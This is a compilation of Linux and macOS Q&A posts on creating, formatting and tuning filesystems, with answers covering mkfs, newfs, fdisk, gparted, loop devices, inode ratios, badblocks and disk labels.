Under Mac OS X, you would use newfs_type as the command, where type is one of hfs, msdos, exfat or udf. There are man pages for all of these. As the other answer mentions, you can use diskutil to create filestems but by using the newfs variants you can set specific filesystem parameters unavailable via diskutil.
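A couple of illustrative invocations — the rdisk2s1 identifier is just a placeholder, so check yours with diskutil list first:
diskutil list                              # find the right slice
sudo newfs_hfs -v MyVolume /dev/rdisk2s1   # HFS+ with the volume name "MyVolume"
sudo newfs_msdos -F 32 /dev/rdisk2s1       # or FAT32 on the same slice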
|
How do you make filesystems in OSX? Mac OSX doesn't have the mkfs command.
| How do you make filesystems in mac OSX |
You can use graphical tools to achieve this, such as GParted. You can install this like so:
apt-get update
apt-get install gparted
Your OS may also include a graphical package manager; if so, you can alternatively install the gparted package from there.
After gparted is installed, run it. Select your flash drive (be careful, make sure it is the right device by checking the size, name, and existing partitions), and delete all of the existing partitions. Then, create a new filesystem that spans the disk, and tell gparted to format it to ext4 (which is probably the filesystem you want), then click OK.
Command line alternative
Alternatively, you can also do this with fdisk and the filesystem's mkfs tool. Assuming the relevant block device is /dev/sdb (check using fdisk -l and/or blkid, it is very possible that it is not) and you want to format to ext4 (you probably do):
# Create partition scheme
fdisk /dev/sdb << 'EOF'
o
n
p
1


w
EOF
# Format partition 1
mkfs.ext4 /dev/sdb1
If you only want one partition, it is also possible to create it with no partition table:
mkfs.ext4 /dev/sdb | I've just installed Linux Mint 14. Now I need to format my USB drive, but I'm not getting any option to do that.
How can I do that with a GUI?
| How to format USB drive in Linux Mint 14 with GUI? [duplicate] |
Unless it's write protected with a hardware switch, that shouldn't matter. You will need to be root.
I assume that by 'format' you mean to delete all the files and recreate the file system.
To do this use parted or gparted to create a new partition.
GParted is easy -- it's a graphical application, while parted is from the command line.
But essentially just find which device your drive is (probably /dev/sdb or sdc some letter after a) and delete the old partition and make a new one.
FAT32 is probably the file system you want, but that's up to you.
GParted is pretty easy installs in gnome, probably in your distro's repositories, parted has man pages if you want to go that route and is probably already installed.
That's pretty much it, but it won't wipe data clean, (i.e. CSI / identity thieves could still get to your data; to do that, you can use dd to copy over every thing from /dev/zero, but I won't go in to that unless you ask).
|
How can I format the write protected pendrive?
| How to format a write protected pen drive in Linux? |
This is supported in the installer. To choose the usage type of a partition created during installation, you need to proceed as follows:
when you get to the partition phase, select “Manual” (you can still have guided partitioning in the manual partitioning tool)
choose the drive you want to partition
confirm you want to create a partition table (if necessary)
choose the free space
create your partitions (you can select “Automatically partition the free space” here to have the installer create them for you)
once your partitions have been created, you’ll return to the list of drives and partitions
choose the partition (or logical volume if you’re using LVM) whose usage you want to change
select “Typical usage” (which should be “standard” by default)
at this point, on Ext4, you can choose the usage you want from “standard”, “news” (lots of inodes), “largefile” (fewer inodes), “largefile4” (even fewer inodes)
select “Done setting up the partition” to return to the list of drives and partitions
select “Finish partitioning and write changes to disk” to continue the installation
The usage you select is used as the value of the -T parameter for mkfs.ext4.
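For comparison, doing the same thing by hand after installation would look roughly like this (the device name is a placeholder); the usage types and their inode_ratio values come from /etc/mke2fs.conf:
mkfs.ext4 -T news /dev/sdXN         # "news" means one inode per 4096 bytes
grep -A 3 news /etc/mke2fs.conf     # see what each usage type actually sets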
|
My system needs a very high number of inodes on the partition because it is going to store many, many small files. (It's going to be an OSM, OpenStreetMap TileServer running mapnik and tirex).
As far I as learnt the number of inodes of a ext4 partition can only be created when formatting with mkfs.ext4 (see answer here). Increasing later is not possible but would require one to reformat (see comment here).
So it's really good to do it right at installation. Is there a way to pass arguments to mkfs.ext4 for mkfs.ext4 -T usage-type /dev/something? So I could mkfs.ext4 -T news /dev/something (usage type news has a lot of inodes).
| How to increase number of inodes at partitioning during installation of Debian? |
lsblk -o NAME,FSTYPE -dsn
This will print a list of block devices that are not themselves holders for partitions (they do not have a partition table). The detected file system type is in the second column. If it's blank there is no recognized file system.
So to get the output you want in one command
lsblk -o NAME,FSTYPE -dsn | awk '$2 == "" {print $1}' |
I want to capture all disks that do not have a filesystem (all disks that mkfs has not been run on).
I tried the below, but it still gives the OS disk (sda).
What is the best approach, with lsblk or another command, to capture all the disks that are without a filesystem?
lsblk -f | egrep -v "xfs|ext3|ext4"
NAME FSTYPE LABEL UUID
MOUNTPOINT
fd0
sda
└─sda2 LVM2_member v0593a-KiKU-9emb-STbx-ByMz-S95k-jChr0m
├─vg00-lv_swap swap 1beb675f-0b4c-4225-8455-e876cafc5756
[SWAP]
sdg
sdh
sdi
sdj
sdk
sr0 | How to capture all disks that don’t have a file system |
update: From looking at lsusb and dmesg, confirmed that the drive has dropped off the USB bus. So the mkfs has hung. kill -9 on it may stop it and allow the mdraid array to be stopped, or a reboot may be required. If you have to reboot, beware that the system may not reboot cleanly—so it'd be best to sync and unmount/remount read-only any other writable filesystems as you may have to hit reset.
Depending on the filesystem and options, mkfs can take a long time (and ext3 is one where it does). It is safe to terminate, but of course you'll have to run mkfs again. Which—if it was actually making progress—means you'll have to wait again (and it will start over from the beginning).
ext4 is much faster to mkfs, especially with lazy_itable_init (which is the default). If possible, switch.
Remember with an ext2/3/4 filesystem, x% of the disk is consumed for inode tables. Without lazy_itable_init, they're all being written now. That's a lot of data to write (approximately 1.6% of the disk with default settings), and spread out over the entire disk no less.
That also gives another way to reduce the time: write fewer inodes. But of course if you go too low, you'll run out.
If you want to check if it's actually making progress, confirm if I/O is happening. Some disks have an indicator light, or you can often tell (with magnetic disks) by holding your ear close and listening.
Alternatively, if you have iostat available, iostat -kx 10 will show you first IO stats since boot, then every 10s statistics over the prior 10s. You can look for the number of writes being done, and the disk utilization.
|
I'm doing data recovery right now from a disk I've extracted from an old NAS.
It looks like mkfs.ext3 froze on Writing superblocks and filesystem accounting information: since it's more that one hour that I'm waiting for done to appear.
The disk is 2TB SATA connected to USB 3.0, is it normal it takes so long? Is it safe to terminate the program now?
| mkfs taking too long |
There is a better alternative to dd for extending a file. The dd command requires several parameters to run properly (so as not to corrupt your data). I use truncate instead. Despite its name it can extend the size of a file as well:
truncate - shrink or extend the size of a file to the specified size
-s, --size=SIZE
set or adjust the file size by SIZE
SIZE is an integer and optional unit (example: 10M is 10*1024*1024). Units are K, M, G, T, P, E, Z, Y (powers of 1024) or KB, MB, ... (powers of 1000).
SIZE may also be prefixed by one of the following modifying characters: '+' extend by, '-' reduce by, '<' at most, '>' at least, '/' round down to multiple of, '%' round up to multiple of.
Thus,
truncate -s +1G MyDrive.vhdsafely expands your file by 1 gigabyte.
And, yes, it does sparse expansion when supported by the underlying filesystem, so the actual blocks would be allocated on demand.
When a file is expanded, don't forget to run resize2fs:
resize2fs MyDrive.vhdAlso, the whole thing may be done online (without umount'ing the device) for file systems that support online resize:
losetup -c loopdevupdates in-kernel information on a backing file,
and
resize2fs loopdevresizes the mounted file system online
|
I found a very nice tutorial on how to create virtual hard disks, and I am considering using these for my work in order to store reliably and portably large datasets with associated processing results.
Basically, the tutorial consist in doing this:
dd if=/dev/zero of=MyDrive.vhd bs=1M count=500
mkfs -t ext3 MyDrive.vhd
mount -t auto -o loop MyDrive.vhd /some/user/folder
which creates a virtual hard drive of 500MB formatted in ext3 and mounts it somewhere.
Now say I use that file and realise I need more than 500MB; is there a way of "dynamically" resizing the virtual disk? (By dynamically I mean other than creating a new bigger disk and copying the data over.)
| Resizing a virtual hard drive |
The loop device is what you need for this. Run these commands as root:
truncate -s1G 1GB.img # Sparse allocation of a 1GB file
ld=$(losetup --show --find 1GB.img); echo "$ld"
You will now have a loop device (for example, /dev/loop0) that you can treat as a block device.
mkfs -t btrfs "$ld" # Device that was returned from losetup

mkdir -p /mnt/dsk
mount "$ld" /mnt/dsk
When you've finished, tidy up again
umount /mnt/dsk
losetup -d "$ld"
rm 1GB.img
If you want to create a partition table on the block device, make sure you always include the --partscan flag on the losetup command. This will create the associated devices, for example, /dev/loop0p1.
|
I want to do a few experiments on the btrfs file system, but I don't want to make any changes to my existing partitions, and I want full control over things like device size.
Is it possible to create a file that looks like a block device that I can mount and unmount, and that will act like a block device such as running out of space?
| Create a file that's treated like a btrfs file system |
As @derobert mentioned in the comment.
mkfs.ext4/mke2fs refers to /etc/mke2fs.conf and formats the partition.
mke2fs chooses the block size based on the partition size if it is not explicitly specified. Read -b block-size and -T usage-type in the mke2fs man page for details.
So when the partition size is less than 512MB, mkfs.ext4 formats it as "small" with the following settings from the mke2fs.conf file.
small = {
blocksize = 1024
inode_size = 128
inode_ratio = 4096
However, when the partition size is more than 512MB, mkfs.ext4 or mke2fs formats the partition using the defaults from the mke2fs.conf file.
[defaults]
base_features = sparse_super,filetype,resize_inode,dir_index,ext_attr
default_mntopts = acl,user_xattr
enable_periodic_fsck = 0
blocksize = 4096
inode_size = 256
inode_ratio = 16384That's what was causing different block sizes in the different partitions for me.
One more note: the total number of inodes you will get after formatting can be calculated as follows,
Total number of inodes = partition size / inode_ratio
e.g.
for 500MB partition
total number of inodes = (500 * 1024 * 1024) / 4096
= 128000
NOTE: I think I am missing something here, because for the calculation shown above, the actual value shown by tune2fs is Inode count: 128016, which nearly matches but is not exact.
|
we have BBB based custom board with 256MB RAM and 4GB eMMC,
I have partitioned it using below code,
parted --script -a optimal /dev/mmcblk0 \
mklabel gpt \
mkpart primary 128KiB 255KiB \
mkpart primary 256KiB 383KiB \
mkpart primary 384KiB 511KiB \
mkpart primary 1MiB 2MiB \
mkpart primary 2MiB 3MiB \
mkpart primary 3MiB 4MiB \
mkpart primary 4MiB 5MiB \
mkpart primary 5MiB 10MiB \
mkpart primary 10MiB 15MiB \
mkpart primary 15MiB 20MiB \
mkpart primary 20MiB 21MiB \
mkpart primary 21MiB 22MiB \
mkpart primary 22MiB 23MiB \
mkpart primary 23MiB 28MiB \
mkpart primary ext4 28MiB 528MiB \
mkpart primary ext4 528MiB 1028MiB \
mkpart primary ext4 1028MiB 1128MiB \
mkpart primary ext4 1128MiB 1188MiB \
mkpart primary ext4 1188MiB 2212MiB \
mkpart primary ext4 2212MiB 2603MiB \
mkpart primary ext4 2603MiB 2639MiB \
mkpart primary ext4 2639MiB 100%
And then I formatted the file system partitions using the below command:
mkfs.ext4 -j -L $LABEL $PARTITION
Now when I read the file system block size using tune2fs, I see different values for partitions smaller than 1GiB and partitions greater than or equal to 1GiB.
# tune2fs -l /dev/mmcblk0p15 | grep Block
Block count: 512000
Block size: 1024
Blocks per group: 8192
#
#
# tune2fs -l /dev/mmcblk0p16 | grep Block
Block count: 512000
Block size: 1024
Blocks per group: 8192
#
#
# tune2fs -l /dev/mmcblk0p19 | grep Block
Block count: 262144
Block size: 4096
Blocks per group: 32768
# tune2fs -l /dev/mmcblk0p22 | grep Block
Block count: 1191936
Block size: 4096
Blocks per group: 32768I am not able to understand why block sizes are different.
moreover mke2fs.conf is having all default values only and blocksize mentioned there is 4096.
[defaults]
base_features = sparse_super,filetype,resize_inode,dir_index,ext_attr
default_mntopts = acl,user_xattr
enable_periodic_fsck = 0
blocksize = 4096
inode_size = 256
inode_ratio = 16384[fs_types]
ext3 = {
features = has_journal
}
ext4 = {
features = has_journal,extent,huge_file,flex_bg,uninit_bg,dir_nlink,extra_isize
auto_64-bit_support = 1
inode_size = 256
}
ext4dev = {
features = has_journal,extent,huge_file,flex_bg,uninit_bg,dir_nlink,extra_isize
inode_size = 256
options = test_fs=1
}
small = {
blocksize = 1024
inode_size = 128
inode_ratio = 4096
}
floppy = {
blocksize = 1024
inode_size = 128
inode_ratio = 8192
}
big = {
inode_ratio = 32768
}
huge = {
inode_ratio = 65536
}
news = {
inode_ratio = 4096
}
largefile = {
inode_ratio = 1048576
blocksize = -1
}
largefile4 = {
inode_ratio = 4194304
blocksize = -1
}
hurd = {
blocksize = 4096
inode_size = 128
}Can someone explain/suggest a doc/hint why block sizes are different for different partitions?
| File system block size differs between different ext4 partitions |
You generally don't want to write the filesystem on the entire block device (ie. /dev/sdd), you want to create a partition and then put the filesystem in there (ie. /dev/sdd1). That is also what your mkfs complained about.
If you are sure you only want to have one filesystem on this disk at a time, and you don't need a bootloader, you can safely ignore this warning using mkfs.vfat -I, and use the whole device. Otherwise, create a partitioning scheme using fdisk or similar (you can create a basic, full one with o, n, p, 1, Enter, Enter, w), and install the filesystem at /dev/sdd1 (or whichever partition you want to use).
If you only plan to use FAT on this device, with no MBR, then it is safe to install to the full device. Otherwise, use a partition table.
|
I have installed Arch Linux ISO file into Flash disk with the following command:
dd bs=2M if=~/archlinux-2013.11.01-dual.iso of=/dev/sdd
Now I'm trying to format the flash disk with the following command:
sudo mkfs.vfat -F 32 /dev/sdd
But it gives me the following error:
mkfs.vfat: Device partition expected, not making filesystem on entire device '/dev/sdd' (use -I to override)
The output of sudo fdisk -l:
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xf3286bd2Device Boot Start End Blocks Id System
/dev/sda1 * 119700315 154850534 17575110 83 Linux
/dev/sda2 19834880 119700314 49932717+ 7 HPFS/NTFS/exFAT
/dev/sda3 154850535 174385574 9767520 83 Linux
/dev/sda4 174385575 625137663 225376044+ f W95 Ext'd (LBA)
/dev/sda5 174385638 185610192 5612277+ 82 Linux swap / Solaris
/dev/sda6 185610256 338423679 76406712 7 HPFS/NTFS/exFAT
/dev/sda7 338423808 477687807 69632000 7 HPFS/NTFS/exFAT
/dev/sda8 477689856 625137663 73723904 7 HPFS/NTFS/exFATPartition table entries are not in disk order.Disk /dev/sdd: 7.5 GiB, 8019509248 bytes, 15663104 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00000000 | Problem with formatting Flash Disk |
It should be mkfs.vfat -I /dev/sdb. sdb1 indicates you probably have more than one partition, and you're just formatting the first one, which happens to be 64MiB.
|
I have a USB drive which I format with
sudo mkfs.vfat -I /dev/sdb1
When I then look at the size of the USB drive with df -h, it reports its size to be 64 MB, though it should be 8 GB. What am I doing wrong?
fdisk -l /dev/sdb1 gives
Disk /dev/sdb1: 67 MB, 67108864 bytes
241 heads, 62 sectors/track, 8 cylinders, total 131072 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00000000 Device Boot Start End Blocks Id System | Format USB drive |
tune2fs applies only to ext[2-4] filesystems; not to XFS ones. The "Bad magic number in super-block" simply means that tune2fs doesn't understand the filesystem type. As you noted, the fact that your filesystem can be mounted confirms that it's viable.
The XFS equivalent of tune2fs -l is xfs_info.
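For example, using the mount point from the question (recent xfsprogs also accept the block device directly):
xfs_info /data_test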
|
I ran into this message two days ago:
tune2fs: Bad magic number in super-block while trying to open /dev/vdc1
Couldn't find valid filesystem superblock.The system is Ubuntu, a KVM virtual machine under CentOS (host). And I have to add a new XFS file system on a new virtual hard drive.
The new virtual hard drive is displayed as /dev/vdc, I created a new partition:
fdisk /dev/vdc
n
p
default
+20G
w
Then I use mkfs to change the partition into XFS:
mkfs.xfs -i size=1024 /dev/vdc1
And this is the result of fdisk -l:
root@server1:/# fdisk -l....Disk /dev/vdc: 21.5 GB, 21474836480 bytes
3 heads, 34 sectors/track, 411206 cylinders, total 41943040 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0xc6bdd34aDevice Boot Start End Blocks Id System
/dev/vdc1 2048 41943039 20970496 83 Linux
....
And this is the result of blkid (/dev/vdc1 is XFS):
root@server1:/# blkid
/dev/vda1: UUID="2a5dd605-7774-4977-8f6c-79f70f222a65" TYPE="ext2"
/dev/vda5: UUID="aBuqo9-bgg0-gRLK-g5aG-xC9c-tdRx-znG819" TYPE="LVM2_member"
/dev/vdb: UUID="8L5N3N-EDmg-716P-Kk0t-4DID-x686-Ytlh2y" TYPE="LVM2_member"
/dev/vdc1: UUID="468ec0df-089b-4225-8519-fd4022db24ed" TYPE="xfs"
/dev/mapper/ubuntu--vg-root: UUID="61e644ad-2975-4017-879d-bb7933c7d6e9" TYPE="ext4"
/dev/mapper/ubuntu--vg-swap_1: UUID="01ca2938-35aa-4c5c-8de4-ed37dc971cd3" TYPE="swap"
And /dev/vdc1 is mountable, which means there are no superblock errors:
root@server1:/# mkdir /data_test
root@server1:/# mount /dev/vdc1 /data_test
(mounted)
And this is the result of df -h after mounting /dev/vdc1:
root@server1:/# df -h
Filesystem Size Used Avail Use% Mounted on
udev 990M 12K 990M 1% /dev
tmpfs 201M 456K 200M 1% /run
/dev/mapper/ubuntu--vg-root 47G 2.2G 43G 5% /
none 4.0K 0 4.0K 0% /sys/fs/cgroup
none 5.0M 0 5.0M 0% /run/lock
none 1001M 0 1001M 0% /run/shm
none 100M 0 100M 0% /run/user
/dev/vda1 236M 38M 186M 17% /boot
/dev/vdc1 20G 33M 20G 1% /data_test
But when I use tune2fs, it tells me that /dev/vdc1 has a superblock error:
root@server1:/# tune2fs -l /dev/vdc1 | grep -i inode
tune2fs: Bad magic number in super-block while trying to open /dev/vdc1
Couldn't find valid filesystem superblock.
How can I fix this error? I tried other commands such as xfs_repair and xfs_check, but none of them work.
| Use "tune2fs" on XFS filesystem, get "Couldn't find valid filesystem superblock." |
Using dd we can wipe the partition table. I remember having success with dd while failing with gdisk's zero feature. (Make sure that you have your data backed up).
# dd if=/dev/zero of=/dev/sda bs=512 count=1024 |
I'm attempting to install Arch Linux using the btrfs filesystem. I'm at the beginning of the install processes preparing my drive and I'm hitting an issue.
Firstly I begin to clear any GPT and MBR records from any previous installation attempts using:
gdisk /dev/sda
I then go into expert mode using the x command and then use z to remove the GPT and/or MBR.
I then use fdisk to create a new partition using the entire space on the drive - which is 119GB.
After creating the partition, and writing it, I then attempt to create the filesystem using:
mkfs.btrfs /dev/sda1
But I get an error:
/dev/sda1 appears to contain an existing filesystem (btrfs)
How is this so? All I have done is created a partition, so how can btrfs already exist as the filesystem type?
| Error when creating BTRFS Filesystem |
If you want to create a filesystem on your usb stick partition, you should do
mkfs -t vfat /dev/sdc1
as a user who has access rights to write to the partition, like root.
|
I have a memory stick which I had cleaned of old data fragments.
The memory stick was mounted on /dev/sdc1 so I did:
dd if=/dev/zero of=/dev/sdc1 bs=1MAfter the task was complete, my usb memory stick became unrecognized.
What do you do in this case to make the drive recognized again and partition it as FAT?
| How do you format a USB stick after it is being labled "unrecognised" by Ubuntu? |
The number hasn't been ignored, it's been rounded up. It looks like space for inodes is allocated in groups. See in your output:
Inodes per group: 1632When you request 99,000 inodes, that's not divisible by 1,632. So to ensure that you get the number of inodes you requested, the number has been rounded up to 99,552 which is divisible by 1,632.
It looks like this limit might be somehow derived from the number of block groups, where the number of inodes in each group is uniform across all block groups. My guess is that the number of inodes per block group is calculated as the number of inodes requested divided by the number of block groups and then rounded up to a whole number. See Ext2 on OSDev WikiWhat is a Block Group? Blocks, along with inodes, are divided up into "block groups." These are nothing more than contiguous groups of
blocks.
Each block group reserves a few of its blocks for special purposes
such as:...
A table of inode structures that belong to the group
.. |
I want to make ext2 file system. I want to set "number-of-inodes" option to some number. I tried several values:if -N 99000 then Inode count: 99552
if -N 3500 then Inode count:
3904
if -N 500 then Inode count: 976But always my value is not the same. Why?
I call mkfs this way
sudo mkfs -q -t ext2 -F /dev/sda2 -b 4096 -N 99000 -O none,sparse_super,large_file,filetypeI check results this way
$ sudo tune2fs -l /dev/sda2
tune2fs 1.46.5 (30-Dec-2021)
Filesystem volume name: <none>
Last mounted on: <not available>
Filesystem UUID: 11111111-2222-3333-4444-555555555555
Filesystem magic number: 0xEF53
Filesystem revision #: 1 (dynamic)
Filesystem features: filetype sparse_super large_file
Filesystem flags: signed_directory_hash
Default mount options: user_xattr acl
Filesystem state: clean
Errors behavior: Continue
Filesystem OS type: Linux
Inode count: 99552
Block count: 1973720
Reserved block count: 98686
Overhead clusters: 6362
Free blocks: 1967353
Free inodes: 99541
First block: 0
Block size: 4096
Fragment size: 4096
Blocks per group: 32768
Fragments per group: 32768
Inodes per group: 1632
Inode blocks per group: 102
Filesystem created: Thu Apr 6 20:00:45 2023
Last mount time: n/a
Last write time: Thu Apr 6 20:01:49 2023
Mount count: 0
Maximum mount count: -1
Last checked: Thu Apr 6 20:00:45 2023
Check interval: 0 (<none>)
Reserved blocks uid: 0 (user root)
Reserved blocks gid: 0 (group root)
First inode: 11
Inode size: 256
Required extra isize: 32
Desired extra isize: 32
Default directory hash: half_md4
Directory Hash Seed: 61ff1bad-c6c8-409f-b334-f277fb29df54 | mkfs ext2 ignore number-of-inodes |
A physical sector size of 4096 means that the data on the drive is laid out in units of 4096 bytes, i.e. disk comprised of sequential "compartments" of 4096 bytes, that have to be written atomically. For compatibility reasons, most disks with 4096 byte sectors present themselves as having traditional 512 byte "logical sectors", which means the addressing unit is a 512 byte block.
The practical implication of this emulation of a 512 sector drive with an underlying disk with 4096 byte sectors is a potential performance issue. When writing a single 512 byte sector to a 512e disk, the drive must read the whole 4096 byte sector containing the 512-byte sector, modify the sector in RAM (on the disk controller) by replacing the 512-byte sector with the new contents, and finally write the whole 4096 sector back to the disk. Things get worse if you are reading or writing a couple of consecutive 512 sectors that happen to cross a 4096 sector boundary.
File systems usually lay out their data structures well, i.e. they are aligned to multiples of at least 4096 bytes, so the bigger sector size normally does not present a problem. This all breaks down, however, if the partition containing the file system itself is not aligned properly. In the case of a 512e disk, the partitions should be aligned so that the first 512-byte logical sector number is a multiple of eight.
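A small sketch for checking that, with the device name taken from the question below; parted's own align-check does a similar per-partition test. The awk one-liner is only an illustration.

# print each partition's starting sector and whether it is a multiple of 8
parted -sm /dev/sdc unit s print | awk -F: 'NR>2 { gsub("s","",$2); print $1": start "$2" -> " ($2 % 8 ? "NOT aligned" : "aligned") }'
# or, per partition:
parted /dev/sdc align-check optimal 1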
|
I just plugged into USB A 3.0 / C 3.1 my new external HDD to Debian Buster system.
The disk was sold as LaCie 2.5" Porsche Design P'9227 2TB USB-C.
Here is the output of fdisk -l /dev/sdc:
Disk /dev/sdc: 1.8 TiB, 2000398934016 bytes, 3907029168 sectors
Disk model: P9227 Slim
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 4096 bytes
I/O size (minimum/optimal): 4096 bytes / 33553920 bytes

I just read some articles about 4k-emulated drives (512e); this one should be the case.
I am confused as to how to format it with NTFS.
I tried to use my brain, and here is what I came up with: the partition should probably start at sector 4096 (?)
So I created a partition with gdisk like this:
Device Start End Sectors Size Type
/dev/sdc1 4096 3907029134 3907025039 1.8T Microsoft basic data

The sector size should probably be forced with the --sector-size option (?), issuing:
mkfs.ntfs --no-indexing --verbose --with-uuid --label EXTERNAL_2TB --quick --sector-size 4096 /dev/sdc1

EDIT1:
Windows 10, fully updated, did not recognize the partition and asked me to format it. I used my favorite tool for that, and back on Linux here is the output of fdisk -l /dev/sdc:
Device Start End Sectors Size Type
/dev/sdc1 2048 3907028991 3907026944 1,8T Microsoft basic data

So why it must start at sector 2048, I don't understand.

EDIT2:
I don't understand what I am doing wrong in terms of compatibility with Windows. Every time I re-partition it / re-format it and boot Windows and plug the drive in, it just offers me to Format it itself.
I am quite positive I tried everything from inside gdisk + mkfs.ntfs.
I would like to know why I am unable to do the same as Windows does from my Linux CLI.

I will answer all questions, as well as comments, tomorrow morning.
I am now running:
pv --progress --timer --eta --rate --average-rate --bytes -s 1953314876k < /dev/zero > /media/vlastimil/LACIE_2TB/zero

with an expected speed of 123 MiB/s.
| Partitioning and formatting a 4k-emulated (512e) HDD |
Because of the way the filesystem is built. It's a bit messy, and by default, you can't even have the ratio as down as 1/64 MB.
From the Ext4 Disk Layout document on kernel.org, we see that the file system internals are tied to the block size (4 kB by default), which controls both the size of a block group, and the amount of inodes in a block group. A block group has a one-block sized bitmap of the blocks in the group, and a minimum of one block of inodes.
Because of the bitmap, the maximum block group size is 8 * (block size in bytes) blocks, so on an FS with 4 kB blocks, the block groups are 32768 blocks or 128 MB in size. The inodes take one block at minimum, so for 4 kB blocks, you get at least (4096 B/block) / (256 B/inode) = 16 inodes in that one block, i.e. at least 16 inodes per group,
or 16 inodes per 128 MB, or 1 inode per 8 MB.
At 256 B/inode, that's 256 B / 8 MB, or 1 byte per 32 kB, or about 0,003 % of the total size, for the inodes.
Decreasing the number of inodes would not help, you'd just get a partially-filled inode block. Also, the size of an inode doesn't really matter either, since the allocation is done by block. It's the block group size that's the real limit for the metadata.Increasing the block size would help, and in theory, the maximum block group size increases in the square of the block size (except that it seems to cap at a bit less than 64k blocks/group). But you can't use a block size greater than the page size of the system, so on x86, you're stuck with 4 kB blocks.However, there's the bigalloc feature that's exactly what you want:for a filesystem of mostly huge files, it is desirable to be able to allocate disk blocks in units of multiple blocks to reduce both fragmentation and metadata overhead. The bigalloc feature provides exactly this ability.
The administrator can set a block cluster size at mkfs time (which is stored in the s_log_cluster_size field in the superblock); from then on, the block bitmaps track clusters, not individual blocks. This means that block groups can be several gigabytes in size (instead of just 128MiB); however, the minimum allocation unit becomes a cluster, not a block, even for directories.You can enable that with mkfs.ext4 -Obigalloc, and set the cluster size with -C<bytes>, but mkfs does note that:
Warning: the bigalloc feature is still under development
See https://ext4.wiki.kernel.org/index.php/Bigalloc for more information

There are mentions of issues in combination with delayed allocation on that page and in the ext4 man page, and the words "huge risk" also appear on the Bigalloc wiki page.

None of that has anything to do with the 64 MB per inode limit set by the -i option. It appears to just be an arbitrary limit set at the interface level.
Because of the 64k blocks/group limit, without bigalloc there's no way to get as few inodes as the ratio of 64 MB / inode would imply, and with bigalloc, the number of inodes can be set much lower than it.
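The arithmetic behind those numbers, as a small shell sketch (4 KiB blocks, 256-byte inodes, no bigalloc):

block_size=4096
blocks_per_group=$(( block_size * 8 ))           # one bitmap block tracks 8 * block_size blocks -> 32768
group_bytes=$(( blocks_per_group * block_size )) # 134217728 bytes = 128 MiB per block group
min_inodes=$(( block_size / 256 ))               # at least one full block of inodes -> 16
echo $(( group_bytes / min_inodes ))             # 8388608 -> at best 1 inode per 8 MiB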
|
Formatting a disk for purely large video files, I calculated what I thought was an appropriate bytes-per-inode value, in order to maximise usable disk space.
I was greeted, however, with:
mkfs.ext4: invalid inode ratio [RATIO] (min 1024/max 67108864)

I assume the minimum is derived from what could even theoretically be used - no point having more inodes than could ever be utilised.
But where does the maximum come from? mkfs doesn't know the size of files I'll put on the filesystem it creates - so unless it was to be {disk size} - {1 inode size} I don't understand why we have a maximum at all, much less one as low as 67MB.
| Why is 67108864 the maximum bytes-per-inode ratio? Why is there a max? |
From man badblocks:
-o output_file
Write the list of bad blocks to the specified file. Without
this option, badblocks displays the list on its standard output.
The format of this file is suitable for use by the -l option in
e2fsck(8) or mke2fs(8).So the correct way would be:
badblocks -o filename /dev/sde1
mkfs.vfat -l filename /dev/sde1 |
mkfs.vfat -c does a simple check for bad blocks.

badblocks runs multiple passes with different patterns and thus detects intermittent errors that mkfs.vfat -c will not catch.
mkfs.vfat -l filename can read a file with badblocks from badblocks. But I have been unable to find an example on how to generate the file using badblocks.
My guess is that it is as simple as:
badblocks -w /dev/sde1 > filename
mkfs.vfat -l filename /dev/sde1

But I have been unable to confirm this. Is there an authoritative source that can confirm this or explain how to use badblocks to generate input for mkfs.vfat -l filename?
| Using badblocks with mkfs -l |
The error message is because it is asking a yes/no question, and "1" is not yes or no. Don't use parted's mkfs command: it is incomplete (it doesn't even support ntfs), broken, and was removed from parted upstream several releases/years ago because of this. Use mkntfs instead.
|
Screenshot:
http://imgur.com/DQnhwG2

I'm trying to format an existing ext2 partition as ntfs (or any filesystem) using the mkfs command in Parted, but when I specify the partition to format I get:
parted: invalid token: 1

"1" being the partition number I specified. I'm not sure what's wrong. The goal here is to find the correct command. I'm not interested in work-arounds using a different program. I'm just doing this to learn the ins and outs of Parted. I've already read the manuals and a ton of blog posts. The command I used was:
$ mkfs 1 ntfs

Details:
Ubuntu 12.04 - Desktop X86-64
Parted 2.3
There is no valuable data on the machine. It's just a vm running Ubuntu with 2 virtual hard drives attached. Sda: Ubuntu Sdb: The drive for testing Parted | Error "parted: invalid token: 1" When Using Parted To Format A Partition? |
A label is a property of a filesystem, not of a disk.
You can use e2label to label an extN filesystem (for N={ 2, 3, 4 }). For an FAT filesystem you would need to use fatlabel, mlabel, or another FAT-aware tool.
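For example (the partition names and labels here are only illustrative):

e2label /dev/sda2 mylabel      # ext2/3/4 filesystem on a partition
fatlabel /dev/sdb1 MYLABEL     # FAT filesystem on a partition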
You seem to have created an extN filesystem on the first disk /dev/sda directly rather than through a partition table. This is generally a really bad idea: you should (almost) always have a partition table for a disk.
The problem with a filesystem directly on the disk (/dev/sda) rather than a partition (such as /dev/sda1) is that you cannot use the disk for anything other than that one filesystem.
Worryingly, from your later edit showing lsblk output, you had other partitions on the disk. At best you've corrupted the first partition table and the disk is using its backup near the end of the disk. At worst you've also overwritten data on one or more of the partitions.
Right now, I would be inclined to recommend that you backup all your data on this disk and rebuild it. Once you've backed it up and tested that the backup was successful, if you're feeling adventurous you could try rebuilding the primary GPT. It seems that gdisk with the r and then c options should do this but I have not tried it. I think I'd be happier wiping the disk and restoring my data.
|
So I have three disks. I had thought to label the volumes themselves:
$ e2label /dev/sda
d80-JD-75MS

$ e2label /dev/sdb
e2label: Bad magic number in super-block while trying to open /dev/sdb
Found a dos partition table in /dev/sdb

$ e2label /dev/sdc
e2label: Bad magic number in super-block while trying to open /dev/sdc
Found a dos partition table in /dev/sdc
"Couldn't find a valid filesystem superblock
